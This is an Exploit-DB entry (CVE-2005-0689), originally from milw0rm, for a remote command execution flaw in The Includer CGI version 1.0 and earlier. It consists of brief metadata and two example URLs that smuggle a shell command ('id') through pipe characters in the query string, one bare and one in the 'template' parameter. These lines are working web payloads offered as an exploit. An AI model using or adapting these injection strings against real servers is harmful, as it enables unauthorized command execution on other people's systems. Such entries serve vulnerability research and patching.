The Includer CGI <= 1.0 - Remote Command Execution

2005-03-07T00:00:00
ID EDB-ID:862
Type exploitdb
Reporter Francisco Alisson
Modified 2005-03-07T00:00:00

Description

The Includer CGI <= 1.0 Remote Command Execution. CVE-2005-0689. Webapps exploit for cgi platform

                                        
                                            Remote Command Execution on:

Example I.: www.host-vulnerable.com/includer.cgi?|id|
Example II.: www.host-vulnerable.com/includer.cgi?template=|id|

# milw0rm.com [2005-03-07]